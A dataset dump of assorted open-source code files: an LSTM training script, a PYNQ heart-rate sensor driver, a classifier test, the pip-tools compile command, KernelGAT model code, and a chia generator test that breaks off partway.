max_stars_repo_path (stringlengths 4-245) | max_stars_repo_name (stringlengths 7-115) | max_stars_count (int64 101-368k) | id (stringlengths 2-8) | content (stringlengths 6-1.03M) |
---|---|---|---|---|
3-2.Lattice_LSTM/train.py | techthiyanes/nlp-notebook | 136 | 12609649 |
# -*- coding: utf-8 -*-
import time
import torch
import torch.optim as optim
import matplotlib.pyplot as plt
import numpy as np
from model import LatticeLSTM
from load_data import char2idx, word2idx, label2idx, data_generator
character_size = len(char2idx)
word_size = len(word2idx)
embed_dim = 300
hidden_dim = 128
EPOCHS = 20
TRAIN_DATA_PATH = './data/train_data'
device = "cuda" if torch.cuda.is_available() else 'cpu'
model = LatticeLSTM(character_size, word_size, label2idx, embed_dim, hidden_dim).to(device)
model.train()
optimizer = optim.Adam(model.parameters(), lr=0.001)
start = time.time()
loss_vals = []
for epoch in range(EPOCHS):
epoch_loss = []
#num = 0
for sent, input_ids, input_words, labels_idx in data_generator(TRAIN_DATA_PATH, char2idx, word2idx, label2idx, shuffle=True):
#num += 1
model.zero_grad()
loss = model.neg_log_likelihood(input_ids, input_words, labels_idx)
loss.backward()
epoch_loss.append(loss.item())
#print(f' num {num}, loss:{loss.item()}')
optimizer.step()
#if num == 3000:
# break
loss_vals.append(np.mean(epoch_loss))
print(f'Epoch[{epoch}] - Loss:{np.mean(epoch_loss)}')
torch.save(model.state_dict(), "./saved_model/model_lattice.pth")
plt.plot(np.linspace(1, EPOCHS, EPOCHS).astype(int), loss_vals)
end = time.time()
print(f'Training costs:{end-start} seconds') |
pynq/lib/pmod/pmod_grove_ear_hr.py | michalkouril/PYNQ | 1,537 | 12609651 | # Copyright (c) 2016, NECST Laboratory, Politecnico di Milano
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from . import Pmod
from . import PMOD_GROVE_G1
from . import PMOD_GROVE_G2
from . import PMOD_GROVE_G3
from . import PMOD_GROVE_G4
__author__ = "<NAME>, <NAME>"
__copyright__ = "Copyright 2016, NECST Laboratory, Politecnico di Milano"
PMOD_GROVE_EAR_HR_PROGRAM = "pmod_grove_ear_hr.bin"
CONFIG_IOP_SWITCH = 0x1
class Grove_EarHR(object):
"""This class controls the Grove ear clip heart rate sensor.
Sensor model: MED03212P.
Attributes
----------
microblaze : Pmod
Microblaze processor instance used by this module.
"""
def __init__(self, mb_info, gr_pin):
"""Return a new instance of an Grove_EarHR object.
Parameters
----------
mb_info : dict
A dictionary storing Microblaze information, such as the
IP name and the reset name.
gr_pin: list
A group of pins on the Pmod-Grove adapter.
"""
if gr_pin not in [PMOD_GROVE_G1,
PMOD_GROVE_G2,
PMOD_GROVE_G3,
PMOD_GROVE_G4]:
raise ValueError("Group number can only be G1 - G4.")
self.microblaze = Pmod(mb_info, PMOD_GROVE_EAR_HR_PROGRAM)
self.microblaze.write_mailbox(0, gr_pin[0])
self.microblaze.write_blocking_command(CONFIG_IOP_SWITCH)
def read(self):
"""Read the heart rate from the sensor.
Returns
-------
float
The heart rate in beats per minute.
"""
beats, interval_ms = self.read_raw()
if 0 < interval_ms < 2500:
rate = 60000.0 / interval_ms
else:
raise RuntimeError("Value out of range or device not connected.")
return rate
def read_raw(self):
"""Read the number of heart beats.
Read the number of beats since the sensor initialization; also read
the time elapsed in ms between the latest two heart beats.
Returns
-------
tuple
Number of heart beats and the time elapsed between the two latest beats.
"""
beats = self.microblaze.read_mailbox(0x4)
interval_ms = self.microblaze.read_mailbox(0x8 + (beats % 4)*4)
return beats, interval_ms
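# Example usage (an illustrative sketch, not part of the original driver; it assumes
# the PYNQ base overlay is loaded and the sensor is attached to group G1 of the
# Pmod-Grove adapter on PMODA):
#
#     from pynq.overlays.base import BaseOverlay
#     base = BaseOverlay("base.bit")
#     ear_hr = Grove_EarHR(base.PMODA, PMOD_GROVE_G1)
#     bpm = ear_hr.read()                      # 60000.0 / interval_ms, see read()
#     beats, interval_ms = ear_hr.read_raw()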
|
terrascript/provider/gitlab.py | hugovk/python-terrascript | 507 | 12609712 | # terrascript/provider/gitlab.py
import terrascript
class gitlab(terrascript.Provider):
pass
__all__ = ["gitlab"]
|
rosie/rosie/chamber_of_deputies/tests/test_monthly_subquota_limit_classifier.py | vbarceloscs/serenata-de-amor | 3,001 | 12609713 |
from unittest import TestCase
import numpy as np
import pandas as pd
from rosie.chamber_of_deputies.classifiers.monthly_subquota_limit_classifier import MonthlySubquotaLimitClassifier
class TestMonthlySubquotaLimitClassifier(TestCase):
'''Testing Monthly Subquota Limit Classifier.
To include new test cases edit `MONTHLY_SUBQUOTA_LIMIT_FIXTURE_FILE`.
Each test case must have the following fields (see existing test cases as examples):
applicant_id:
A personal identifier code for every person making expenses.
Use the same number to group a test case that requires more than one
expense request.
subquota_number:
A number to classify a category of expenses.
Allowed values:
3 -- Fuels and lubricants
8 -- Security service provided by specialized company
120 -- Automotive vehicle renting or charter
122 -- Taxi, toll and parking
137 -- Participation in course, talk or similar event
issue_date:
Date when the expense was made.
year:
The quota year matching the expense request.
month:
The quota month matching the expense request.
net_value:
The value of the expense.
expected_prediction:
True or False indicating if this test case must be classified as suspicious or not.
test_case_description:
Description of what is being tested in this test case (also shown when the test fails)
'''
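# An illustrative fixture row with hypothetical values, following the fields
# described in the docstring above (the real rows live in MONTHLY_SUBQUOTA_LIMIT_FIXTURE_FILE):
#
#   applicant_id,subquota_number,issue_date,year,month,net_value,expected_prediction,test_case_description
#   444,120,2016-05-02,2016,5,15000,True,Expense above the monthly limit for vehicle renting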
MONTHLY_SUBQUOTA_LIMIT_FIXTURE_FILE = 'rosie/chamber_of_deputies/tests/fixtures/monthly_subquota_limit_classifier.csv'
def setUp(self):
self.full_dataset = pd.read_csv(
self.MONTHLY_SUBQUOTA_LIMIT_FIXTURE_FILE, dtype={'subquota_number': np.str})
self.dataset = self.full_dataset[
['applicant_id', 'subquota_number', 'issue_date', 'year', 'month', 'net_value']]
self.test_result_dataset = self.full_dataset[['expected_prediction', 'test_case_description']]
self.subject = MonthlySubquotaLimitClassifier()
self.subject.fit_transform(self.dataset)
self.prediction = self.subject.predict(self.dataset)
def test_predictions(self):
for index, row in self.test_result_dataset.iterrows():
self.assertEqual(
self.prediction[index],
row['expected_prediction'],
msg='Line {0}: {1}'.format(row, row['test_case_description'])) |
piptools/scripts/compile.py | m-mead/pip-tools | 4,085 | 12609805 | import itertools
import os
import shlex
import sys
import tempfile
from typing import IO, Any, BinaryIO, List, Optional, Tuple, Union, cast
import click
from click.utils import LazyFile, safecall
from pep517 import meta
from pip._internal.commands import create_command
from pip._internal.req import InstallRequirement
from pip._internal.req.constructors import install_req_from_line
from pip._internal.utils.misc import redact_auth_from_url
from .._compat import IS_CLICK_VER_8_PLUS, parse_requirements
from ..cache import DependencyCache
from ..exceptions import PipToolsError
from ..locations import CACHE_DIR
from ..logging import log
from ..repositories import LocalRequirementsRepository, PyPIRepository
from ..repositories.base import BaseRepository
from ..resolver import Resolver
from ..utils import (
UNSAFE_PACKAGES,
dedup,
drop_extras,
is_pinned_requirement,
key_from_ireq,
)
from ..writer import OutputWriter
DEFAULT_REQUIREMENTS_FILE = "requirements.in"
DEFAULT_REQUIREMENTS_OUTPUT_FILE = "requirements.txt"
METADATA_FILENAMES = frozenset({"setup.py", "setup.cfg", "pyproject.toml"})
# TODO: drop click 7 and remove this block, pass directly to version_option
version_option_kwargs = {"package_name": "pip-tools"} if IS_CLICK_VER_8_PLUS else {}
def _get_default_option(option_name: str) -> Any:
"""
Get default value of the pip's option (including option from pip.conf)
by a given option name.
"""
install_command = create_command("install")
default_values = install_command.parser.get_default_values()
return getattr(default_values, option_name)
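# Illustrative example (assumes a stock pip configuration with no pip.conf overrides):
#
#     >>> _get_default_option("index_url")
#     'https://pypi.org/simple'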
@click.command(context_settings={"help_option_names": ("-h", "--help")})
@click.version_option(**version_option_kwargs)
@click.pass_context
@click.option("-v", "--verbose", count=True, help="Show more output")
@click.option("-q", "--quiet", count=True, help="Give less output")
@click.option(
"-n",
"--dry-run",
is_flag=True,
help="Only show what would happen, don't change anything",
)
@click.option(
"-p",
"--pre",
is_flag=True,
default=None,
help="Allow resolving to prereleases (default is not)",
)
@click.option(
"-r",
"--rebuild",
is_flag=True,
help="Clear any caches upfront, rebuild from scratch",
)
@click.option(
"--extra",
"extras",
multiple=True,
help="Name of an extras_require group to install; may be used more than once",
)
@click.option(
"-f",
"--find-links",
multiple=True,
help="Look for archives in this directory or on this HTML page; may be used more than once",
)
@click.option(
"-i",
"--index-url",
help="Change index URL (defaults to {index_url})".format(
index_url=redact_auth_from_url(_get_default_option("index_url"))
),
)
@click.option(
"--extra-index-url",
multiple=True,
help="Add another index URL to search; may be used more than once",
)
@click.option("--cert", help="Path to alternate CA bundle.")
@click.option(
"--client-cert",
help="Path to SSL client certificate, a single file containing "
"the private key and the certificate in PEM format.",
)
@click.option(
"--trusted-host",
multiple=True,
help="Mark this host as trusted, even though it does not have "
"valid or any HTTPS; may be used more than once",
)
@click.option(
"--header/--no-header",
is_flag=True,
default=True,
help="Add header to generated file",
)
@click.option(
"--emit-trusted-host/--no-emit-trusted-host",
is_flag=True,
default=True,
help="Add trusted host option to generated file",
)
@click.option(
"--annotate/--no-annotate",
is_flag=True,
default=True,
help="Annotate results, indicating where dependencies come from",
)
@click.option(
"--annotation-style",
type=click.Choice(("line", "split")),
default="split",
help="Choose the format of annotation comments",
)
@click.option(
"-U",
"--upgrade/--no-upgrade",
is_flag=True,
default=False,
help="Try to upgrade all dependencies to their latest versions",
)
@click.option(
"-P",
"--upgrade-package",
"upgrade_packages",
nargs=1,
multiple=True,
help="Specify a particular package to upgrade; may be used more than once",
)
@click.option(
"-o",
"--output-file",
nargs=1,
default=None,
type=click.File("w+b", atomic=True, lazy=True),
help=(
"Output file name. Required if more than one input file is given. "
"Will be derived from input file otherwise."
),
)
@click.option(
"--allow-unsafe/--no-allow-unsafe",
is_flag=True,
default=False,
help=(
"Pin packages considered unsafe: {}.\n\n"
"WARNING: Future versions of pip-tools will enable this behavior by default. "
"Use --no-allow-unsafe to keep the old behavior. It is recommended to pass the "
"--allow-unsafe now to adapt to the upcoming change.".format(
", ".join(sorted(UNSAFE_PACKAGES))
)
),
)
@click.option(
"--strip-extras",
is_flag=True,
default=False,
help="Assure output file is constraints compatible, avoiding use of extras.",
)
@click.option(
"--generate-hashes",
is_flag=True,
default=False,
help="Generate pip 8 style hashes in the resulting requirements file.",
)
@click.option(
"--reuse-hashes/--no-reuse-hashes",
is_flag=True,
default=True,
help=(
"Improve the speed of --generate-hashes by reusing the hashes from an "
"existing output file."
),
)
@click.option(
"--max-rounds",
default=10,
help="Maximum number of rounds before resolving the requirements aborts.",
)
@click.argument("src_files", nargs=-1, type=click.Path(exists=True, allow_dash=True))
@click.option(
"--build-isolation/--no-build-isolation",
is_flag=True,
default=True,
help="Enable isolation when building a modern source distribution. "
"Build dependencies specified by PEP 518 must be already installed "
"if build isolation is disabled.",
)
@click.option(
"--emit-find-links/--no-emit-find-links",
is_flag=True,
default=True,
help="Add the find-links option to generated file",
)
@click.option(
"--cache-dir",
help="Store the cache data in DIRECTORY.",
default=CACHE_DIR,
envvar="PIP_TOOLS_CACHE_DIR",
show_default=True,
show_envvar=True,
type=click.Path(file_okay=False, writable=True),
)
@click.option(
"--pip-args", "pip_args_str", help="Arguments to pass directly to the pip command."
)
@click.option(
"--emit-index-url/--no-emit-index-url",
is_flag=True,
default=True,
help="Add index URL to generated file",
)
@click.option(
"--emit-options/--no-emit-options",
is_flag=True,
default=True,
help="Add options to generated file",
)
def cli(
ctx: click.Context,
verbose: int,
quiet: int,
dry_run: bool,
pre: bool,
rebuild: bool,
extras: Tuple[str, ...],
find_links: Tuple[str, ...],
index_url: str,
extra_index_url: Tuple[str, ...],
cert: Optional[str],
client_cert: Optional[str],
trusted_host: Tuple[str, ...],
header: bool,
emit_trusted_host: bool,
annotate: bool,
annotation_style: str,
upgrade: bool,
upgrade_packages: Tuple[str, ...],
output_file: Union[LazyFile, IO[Any], None],
allow_unsafe: bool,
strip_extras: bool,
generate_hashes: bool,
reuse_hashes: bool,
src_files: Tuple[str, ...],
max_rounds: int,
build_isolation: bool,
emit_find_links: bool,
cache_dir: str,
pip_args_str: Optional[str],
emit_index_url: bool,
emit_options: bool,
) -> None:
"""Compiles requirements.txt from requirements.in specs."""
log.verbosity = verbose - quiet
if len(src_files) == 0:
if os.path.exists(DEFAULT_REQUIREMENTS_FILE):
src_files = (DEFAULT_REQUIREMENTS_FILE,)
elif os.path.exists("setup.py"):
src_files = ("setup.py",)
else:
raise click.BadParameter(
(
"If you do not specify an input file, "
"the default is {} or setup.py"
).format(DEFAULT_REQUIREMENTS_FILE)
)
if not output_file:
# An output file must be provided for stdin
if src_files == ("-",):
raise click.BadParameter("--output-file is required if input is from stdin")
# Use the default requirements output file if the source is a metadata file (setup.py etc.)
elif os.path.basename(src_files[0]) in METADATA_FILENAMES:
file_name = os.path.join(
os.path.dirname(src_files[0]), DEFAULT_REQUIREMENTS_OUTPUT_FILE
)
# An output file must be provided if there are multiple source files
elif len(src_files) > 1:
raise click.BadParameter(
"--output-file is required if two or more input files are given."
)
# Otherwise derive the output file from the source file
else:
base_name = src_files[0].rsplit(".", 1)[0]
file_name = base_name + ".txt"
output_file = click.open_file(file_name, "w+b", atomic=True, lazy=True)
# Close the file at the end of the context execution
assert output_file is not None
# only LazyFile has close_intelligently, newer IO[Any] does not
if isinstance(output_file, LazyFile): # pragma: no cover
ctx.call_on_close(safecall(output_file.close_intelligently))
###
# Setup
###
right_args = shlex.split(pip_args_str or "")
pip_args = []
for link in find_links:
pip_args.extend(["-f", link])
if index_url:
pip_args.extend(["-i", index_url])
for extra_index in extra_index_url:
pip_args.extend(["--extra-index-url", extra_index])
if cert:
pip_args.extend(["--cert", cert])
if client_cert:
pip_args.extend(["--client-cert", client_cert])
if pre:
pip_args.extend(["--pre"])
for host in trusted_host:
pip_args.extend(["--trusted-host", host])
if not build_isolation:
pip_args.append("--no-build-isolation")
pip_args.extend(right_args)
repository: BaseRepository
repository = PyPIRepository(pip_args, cache_dir=cache_dir)
# Parse all constraints coming from --upgrade-package/-P
upgrade_reqs_gen = (install_req_from_line(pkg) for pkg in upgrade_packages)
upgrade_install_reqs = {
key_from_ireq(install_req): install_req for install_req in upgrade_reqs_gen
}
existing_pins_to_upgrade = set()
# Proxy with a LocalRequirementsRepository if --upgrade is not specified
# (= default invocation)
if not upgrade and os.path.exists(output_file.name):
# Use a temporary repository to ensure outdated(removed) options from
# existing requirements.txt wouldn't get into the current repository.
tmp_repository = PyPIRepository(pip_args, cache_dir=cache_dir)
ireqs = parse_requirements(
output_file.name,
finder=tmp_repository.finder,
session=tmp_repository.session,
options=tmp_repository.options,
)
# Exclude packages from --upgrade-package/-P from the existing
# constraints, and separately gather pins to be upgraded
existing_pins = {}
for ireq in filter(is_pinned_requirement, ireqs):
key = key_from_ireq(ireq)
if key in upgrade_install_reqs:
existing_pins_to_upgrade.add(key)
else:
existing_pins[key] = ireq
repository = LocalRequirementsRepository(
existing_pins, repository, reuse_hashes=reuse_hashes
)
###
# Parsing/collecting initial requirements
###
constraints: List[InstallRequirement] = []
setup_file_found = False
for src_file in src_files:
is_setup_file = os.path.basename(src_file) in METADATA_FILENAMES
if src_file == "-":
# pip requires filenames and not files. Since we want to support
# piping from stdin, we need to briefly save the input from stdin
# to a temporary file and have pip read that. Also used for
# reading requirements from install_requires in setup.py.
tmpfile = tempfile.NamedTemporaryFile(mode="wt", delete=False)
tmpfile.write(sys.stdin.read())
comes_from = "-r -"
tmpfile.flush()
reqs = list(
parse_requirements(
tmpfile.name,
finder=repository.finder,
session=repository.session,
options=repository.options,
)
)
for req in reqs:
req.comes_from = comes_from
constraints.extend(reqs)
elif is_setup_file:
setup_file_found = True
dist = meta.load(os.path.dirname(os.path.abspath(src_file)))
comes_from = f"{dist.metadata.get_all('Name')[0]} ({src_file})"
constraints.extend(
[
install_req_from_line(req, comes_from=comes_from)
for req in dist.requires or []
]
)
else:
constraints.extend(
parse_requirements(
src_file,
finder=repository.finder,
session=repository.session,
options=repository.options,
)
)
extras = tuple(itertools.chain.from_iterable(ex.split(",") for ex in extras))
if extras and not setup_file_found:
msg = "--extra has effect only with setup.py and PEP-517 input formats"
raise click.BadParameter(msg)
primary_packages = {
key_from_ireq(ireq) for ireq in constraints if not ireq.constraint
}
allowed_upgrades = primary_packages | existing_pins_to_upgrade
constraints.extend(
ireq for key, ireq in upgrade_install_reqs.items() if key in allowed_upgrades
)
constraints = [req for req in constraints if req.match_markers(extras)]
for req in constraints:
drop_extras(req)
log.debug("Using indexes:")
with log.indentation():
for index_url in dedup(repository.finder.index_urls):
log.debug(redact_auth_from_url(index_url))
if repository.finder.find_links:
log.debug("")
log.debug("Using links:")
with log.indentation():
for find_link in dedup(repository.finder.find_links):
log.debug(redact_auth_from_url(find_link))
try:
resolver = Resolver(
constraints,
repository,
prereleases=repository.finder.allow_all_prereleases or pre,
cache=DependencyCache(cache_dir),
clear_caches=rebuild,
allow_unsafe=allow_unsafe,
)
results = resolver.resolve(max_rounds=max_rounds)
hashes = resolver.resolve_hashes(results) if generate_hashes else None
except PipToolsError as e:
log.error(str(e))
sys.exit(2)
log.debug("")
##
# Output
##
writer = OutputWriter(
cast(BinaryIO, output_file),
click_ctx=ctx,
dry_run=dry_run,
emit_header=header,
emit_index_url=emit_index_url,
emit_trusted_host=emit_trusted_host,
annotate=annotate,
annotation_style=annotation_style,
strip_extras=strip_extras,
generate_hashes=generate_hashes,
default_index_url=repository.DEFAULT_INDEX_URL,
index_urls=repository.finder.index_urls,
trusted_hosts=repository.finder.trusted_hosts,
format_control=repository.finder.format_control,
allow_unsafe=allow_unsafe,
find_links=repository.finder.find_links,
emit_find_links=emit_find_links,
emit_options=emit_options,
)
writer.write(
results=results,
unsafe_requirements=resolver.unsafe_constraints,
markers={
key_from_ireq(ireq): ireq.markers for ireq in constraints if ireq.markers
},
hashes=hashes,
)
if dry_run:
log.info("Dry-run, so nothing updated.")
|
kgat/models.py | QZx7/KernelGAT | 150 | 12609811 | import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import BatchNorm1d, Linear, ReLU
from bert_model import BertForSequenceEncoder
from torch.autograd import Variable
import numpy as np
def kernal_mus(n_kernels):
"""
Get the mu for each Gaussian kernel. Mu is the middle of each bin.
:param n_kernels: number of kernels (including exact match); the first one is the exact match
:return: l_mu, a list of mu.
"""
l_mu = [1]
if n_kernels == 1:
return l_mu
bin_size = 2.0 / (n_kernels - 1) # score range from [-1, 1]
l_mu.append(1 - bin_size / 2) # mu: middle of the bin
for i in range(1, n_kernels - 1):
l_mu.append(l_mu[i] - bin_size)
return l_mu
def kernel_sigmas(n_kernels):
"""
Get sigmas for each Gaussian kernel.
:param n_kernels: number of kernels (including exact match)
:return: l_sigma, a list of sigma
"""
bin_size = 2.0 / (n_kernels - 1)
l_sigma = [0.001] # for exact match. small variance -> exact match
if n_kernels == 1:
return l_sigma
l_sigma += [0.1] * (n_kernels - 1)
return l_sigma
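# Worked example (follows directly from the two helpers above):
#
#     >>> kernal_mus(3)
#     [1, 0.5, -0.5]
#     >>> kernel_sigmas(3)
#     [0.001, 0.1, 0.1]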
class inference_model(nn.Module):
def __init__(self, bert_model, args):
super(inference_model, self).__init__()
self.bert_hidden_dim = args.bert_hidden_dim
self.dropout = nn.Dropout(args.dropout)
self.max_len = args.max_len
self.num_labels = args.num_labels
self.pred_model = bert_model
self.evi_num = args.evi_num
self.nlayer = args.layer
self.kernel = args.kernel
self.proj_inference_de = nn.Linear(self.bert_hidden_dim * 2, self.num_labels)
self.proj_att = nn.Linear(self.kernel, 1)
self.proj_input_de = nn.Linear(self.bert_hidden_dim, self.bert_hidden_dim)
self.proj_gat = nn.Sequential(
Linear(self.bert_hidden_dim * 2, 128),
ReLU(True),
Linear(128, 1)
)
self.proj_select = nn.Linear(self.kernel, 1)
self.mu = Variable(torch.FloatTensor(kernal_mus(self.kernel)), requires_grad = False).view(1, 1, 1, 21).cuda()
self.sigma = Variable(torch.FloatTensor(kernel_sigmas(self.kernel)), requires_grad = False).view(1, 1, 1, 21).cuda()
def self_attention(self, inputs, inputs_hiddens, mask, mask_evidence, index):
idx = torch.LongTensor([index]).cuda()
mask = mask.view([-1, self.evi_num, self.max_len])
mask_evidence = mask_evidence.view([-1, self.evi_num, self.max_len])
own_hidden = torch.index_select(inputs_hiddens, 1, idx)
own_mask = torch.index_select(mask, 1, idx)
own_input = torch.index_select(inputs, 1, idx)
own_hidden = own_hidden.repeat(1, self.evi_num, 1, 1)
own_mask = own_mask.repeat(1, self.evi_num, 1)
own_input = own_input.repeat(1, self.evi_num, 1)
hiddens_norm = F.normalize(inputs_hiddens, p=2, dim=-1)
own_norm = F.normalize(own_hidden, p=2, dim=-1)
att_score = self.get_intersect_matrix_att(hiddens_norm.view(-1, self.max_len, self.bert_hidden_dim), own_norm.view(-1, self.max_len, self.bert_hidden_dim),
mask_evidence.view(-1, self.max_len), own_mask.view(-1, self.max_len))
att_score = att_score.view(-1, self.evi_num, self.max_len, 1)
#if index == 1:
# for i in range(self.evi_num):
#print (att_score.view(-1, self.evi_num, self.max_len)[0, 1, :])
denoise_inputs = torch.sum(att_score * inputs_hiddens, 2)
weight_inp = torch.cat([own_input, inputs], -1)
weight_inp = self.proj_gat(weight_inp)
weight_inp = F.softmax(weight_inp, dim=1)
outputs = (inputs * weight_inp).sum(dim=1)
weight_de = torch.cat([own_input, denoise_inputs], -1)
weight_de = self.proj_gat(weight_de)
weight_de = F.softmax(weight_de, dim=1)
outputs_de = (denoise_inputs * weight_de).sum(dim=1)
return outputs, outputs_de
def get_intersect_matrix(self, q_embed, d_embed, attn_q, attn_d):
attn_q = attn_q.view(attn_q.size()[0], attn_q.size()[1], 1)
attn_d = attn_d.view(attn_d.size()[0], 1, attn_d.size()[1], 1)
sim = torch.bmm(q_embed, torch.transpose(d_embed, 1, 2)).view(q_embed.size()[0], q_embed.size()[1], d_embed.size()[1], 1)
pooling_value = torch.exp((- ((sim - self.mu.cuda()) ** 2) / (self.sigma.cuda() ** 2) / 2)) * attn_d
pooling_sum = torch.sum(pooling_value, 2)
log_pooling_sum = torch.log(torch.clamp(pooling_sum, min=1e-10)) * attn_q
log_pooling_sum = torch.sum(log_pooling_sum, 1) / (torch.sum(attn_q, 1) + 1e-10)
log_pooling_sum = self.proj_select(log_pooling_sum).view([-1, 1])
return log_pooling_sum
def get_intersect_matrix_att(self, q_embed, d_embed, attn_q, attn_d):
attn_q = attn_q.view(attn_q.size()[0], attn_q.size()[1])
attn_d = attn_d.view(attn_d.size()[0], 1, attn_d.size()[1], 1)
sim = torch.bmm(q_embed, torch.transpose(d_embed, 1, 2)).view(q_embed.size()[0], q_embed.size()[1], d_embed.size()[1], 1)
pooling_value = torch.exp((- ((sim - self.mu.cuda()) ** 2) / (self.sigma.cuda() ** 2) / 2)) * attn_d
log_pooling_sum = torch.sum(pooling_value, 2)
log_pooling_sum = torch.log(torch.clamp(log_pooling_sum, min=1e-10))
log_pooling_sum = self.proj_att(log_pooling_sum).squeeze(-1)
log_pooling_sum = log_pooling_sum.masked_fill_((1 - attn_q).bool(), -1e4)
log_pooling_sum = F.softmax(log_pooling_sum, dim=1)
return log_pooling_sum
def forward(self, inputs):
inp_tensor, msk_tensor, seg_tensor = inputs
msk_tensor = msk_tensor.view(-1, self.max_len)
inp_tensor = inp_tensor.view(-1, self.max_len)
seg_tensor = seg_tensor.view(-1, self.max_len)
inputs_hiddens, inputs = self.pred_model(inp_tensor, msk_tensor, seg_tensor)
mask_text = msk_tensor.view(-1, self.max_len).float()
mask_text[:, 0] = 0.0
mask_claim = (1 - seg_tensor.float()) * mask_text
mask_evidence = seg_tensor.float() * mask_text
inputs_hiddens = inputs_hiddens.view(-1, self.max_len, self.bert_hidden_dim)
inputs_hiddens_norm = F.normalize(inputs_hiddens, p=2, dim=2)
log_pooling_sum = self.get_intersect_matrix(inputs_hiddens_norm, inputs_hiddens_norm, mask_claim, mask_evidence)
log_pooling_sum = log_pooling_sum.view([-1, self.evi_num, 1])
select_prob = F.softmax(log_pooling_sum, dim=1)
inputs = inputs.view([-1, self.evi_num, self.bert_hidden_dim])
inputs_hiddens = inputs_hiddens.view([-1, self.evi_num, self.max_len, self.bert_hidden_dim])
inputs_att_de = []
for i in range(self.evi_num):
outputs, outputs_de = self.self_attention(inputs, inputs_hiddens, mask_text, mask_text, i)
inputs_att_de.append(outputs_de)
inputs_att = inputs.view([-1, self.evi_num, self.bert_hidden_dim])
inputs_att_de = torch.cat(inputs_att_de, dim=1)
inputs_att_de = inputs_att_de.view([-1, self.evi_num, self.bert_hidden_dim])
inputs_att = torch.cat([inputs_att, inputs_att_de], -1)
inference_feature = self.proj_inference_de(inputs_att)
class_prob = F.softmax(inference_feature, dim=2)
prob = torch.sum(select_prob * class_prob, 1)
prob = torch.log(prob)
return prob
|
tests/generator/test_scan.py | ForestCrazy/chia-blockchain-remote-plot | 11,902 | 12609821 |
from unittest import TestCase
from chia.full_node.bundle_tools import (
match_standard_transaction_at_any_index,
match_standard_transaction_exactly_and_return_pubkey,
)
from chia.util.byte_types import hexstr_to_bytes
gen1 = hexstr_to_bytes(
"ff01ffffffa00000000000000000000000000000000000000000000000000000000000000000ff830186a080ffffff02ffff01ff02ffff01ff02ffff03ff0bffff01ff02ffff03ffff09ff05ffff1dff0bffff1effff0bff0bffff02ff06ffff04ff02ffff04ff17ff8080808080808080ffff01ff02ff17ff2f80ffff01ff088080ff0180ffff01ff04ffff04ff04ffff04ff05ffff04ffff02ff06ffff04ff02ffff04ff17ff80808080ff80808080ffff02ff17ff2f808080ff0180ffff04ffff01ff32ff02ffff03ffff07ff0580ffff01ff0bffff0102ffff02ff06ffff04ff02ffff04ff09ff80808080ffff02ff06ffff04ff02ffff04ff0dff8080808080ffff01ff0bffff0101ff058080ff0180ff018080ffff04ffff01b081963921826355dcb6c355ccf9c2637c18adf7d38ee44d803ea9ca41587e48c913d8d46896eb830aeadfc13144a8eac3ff018080ffff80ffff01ffff33ffa06b7a83babea1eec790c947db4464ab657dbe9b887fe9acc247062847b8c2a8a9ff830186a08080ff8080808080" # noqa
)
EXPECTED_START = 46
PUBKEY_PLUS_SUFFIX = 48 + 4 + 1
EXPECTED_END = 337 - PUBKEY_PLUS_SUFFIX
STANDARD_TRANSACTION_1 = hexstr_to_bytes(
"""ff02ffff01ff02ffff01ff02ffff03ff0bffff01ff02ffff03ffff09ff05ffff1dff0bffff1effff0bff0bffff02ff06ffff04ff02ffff04ff17ff8080808080808080ffff01ff02ff17ff2f80ffff01ff088080ff0180ffff01ff04ffff04ff04ffff04ff05ffff04ffff02ff06ffff04ff02ffff04ff17ff80808080ff80808080ffff02ff17ff2f808080ff0180ffff04ffff01ff32ff02ffff03ffff07ff0580ffff01ff0bffff0102ffff02ff06ffff04ff02ffff04ff09ff80808080ffff02ff06ffff04ff02ffff04ff0dff8080808080ffff01ff0bffff0101ff058080ff0180ff018080ffff04ffff01b0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaff018080""" # noqa
)
STANDARD_TRANSACTION_2 = hexstr_to_bytes(
"""ff02ffff01ff02ffff01ff02ffff03ff0bffff01ff02ffff03ffff09ff05ffff1dff0bffff1effff0bff0bffff02ff06ffff04ff02ffff04ff17ff8080808080808080ffff01ff02ff17ff2f80ffff01ff088080ff0180ffff01ff04ffff04ff04ffff04ff05ffff04ffff02ff06ffff04ff02ffff04ff17ff80808080ff80808080ffff02ff17ff2f808080ff0180ffff04ffff01ff32ff02ffff03ffff07ff0580ffff01ff0bffff0102ffff02ff06ffff04ff02ffff04ff09ff80808080ffff02ff06ffff04ff02ffff04ff0dff8080808080ffff01ff0bffff0101ff058080ff0180ff018080ffff04ffff01b0bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbff018080""" # noqa
)
class TestScan(TestCase):
def test_match_generator(self):
# match_standard_transaction_at_any_index(generator_body: bytes) -> (int,int):
